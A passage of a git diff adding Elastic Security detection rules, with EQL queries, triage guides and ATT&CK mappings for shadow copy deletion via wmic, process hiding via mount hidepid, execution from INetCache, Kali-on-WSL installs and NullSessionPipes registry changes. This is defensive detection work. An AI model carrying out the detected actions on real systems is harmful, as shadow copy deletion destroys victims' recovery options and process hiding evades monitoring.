"name": "Potential Hidden Process via Mount Hidepid", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"mount\" and process.args == \"/proc\" and process.args == \"-o\" and\nprocess.args : \"*hidepid=2*\"\n", + "references": [ + "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "dc71c186-9fe4-4437-a4d0-85ebb32b8204", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "dc71c186-9fe4-4437-a4d0-85ebb32b8204_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_109.json b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_109.json new file mode 100644 index 00000000000..79bf3b10d08 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_109.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Volume Shadow Copy Deletion via WMIC", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via WMIC\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring.\n\nThis rule monitors the execution of `wmic.exe` to interact with VSS via the `shadowcopy` alias and delete parameter.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"WMIC.exe\" or ?process.pe.original_file_name == \"wmic.exe\") and\n process.args : \"delete\" and process.args : \"shadowcopy\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_110.json b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_110.json new file mode 100644 index 00000000000..2ba2f3793f8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_110.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Volume Shadow Copy Deletion via WMIC", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via WMIC\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring.\n\nThis rule monitors the execution of `wmic.exe` to interact with VSS via the `shadowcopy` alias and delete parameter.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"WMIC.exe\" or ?process.pe.original_file_name == \"wmic.exe\") and\n process.args : \"delete\" and process.args : \"shadowcopy\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_1.json b/packages/security_detection_engine/kibana/security_rule/dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_1.json new file mode 100644 index 00000000000..8edb11b3bed --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_1.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a process with arguments pointing to the INetCache Folder. Adversaries may deliver malicious content via WININET during initial access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution from INET Cache", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and \n process.parent.name : (\"explorer.exe\", \"winrar.exe\", \"7zFM.exe\", \"Bandizip.exe\") and\n (process.args : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\" or\n process.executable : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\")\n", + "references": [ + "https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "dca6b4b0-ae70-44eb-bb7a-ce6db502ee78", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Command and Control", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_2.json b/packages/security_detection_engine/kibana/security_rule/dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_2.json new file mode 100644 index 00000000000..bf63cf755fa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_2.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a process with arguments pointing to the INetCache Folder. Adversaries may deliver malicious content via WININET during initial access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution from INET Cache", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and \n process.parent.name : (\"explorer.exe\", \"winrar.exe\", \"7zFM.exe\", \"Bandizip.exe\") and\n (process.args : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\" or\n process.executable : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\")\n", + "references": [ + "https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "dca6b4b0-ae70-44eb-bb7a-ce6db502ee78", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Command and Control", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_7.json b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_7.json new file mode 100644 index 00000000000..94e641e62b0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_7.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to install or use Kali Linux via Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Install Kali Linux via WSL", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (process.name : \"wsl.exe\" and process.args : (\"-d\", \"--distribution\", \"-i\", \"--install\") and process.args : \"kali*\") or \n process.executable : \n (\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\packages\\\\kalilinux*\", \n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\WindowsApps\\\\kali.exe\",\n \"?:\\\\Program Files*\\\\WindowsApps\\\\KaliLinux.*\\\\kali.exe\")\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/windows/wsl/wsl-config" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_107.json b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_107.json new file mode 100644 index 00000000000..e8d84006dc5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_107.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies NullSessionPipe registry modifications that specify which pipes can be accessed anonymously. This could be indicative of adversary lateral movement preparation by making the added pipe available to everyone.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "NullSessionPipe Registry Modification", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) > 0\n", + "references": [ + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ddab1f5f-7089-44f5-9fda-de5b11322e77", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "ddab1f5f-7089-44f5-9fda-de5b11322e77_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_108.json b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_108.json new file mode 100644 index 00000000000..2da8f44f8e9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_108.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies NullSessionPipe registry modifications that specify which pipes can be accessed anonymously. This could be indicative of adversary lateral movement preparation by making the added pipe available to everyone.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "NullSessionPipe Registry Modification", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) > 0\n", + "references": [ + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ddab1f5f-7089-44f5-9fda-de5b11322e77", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": 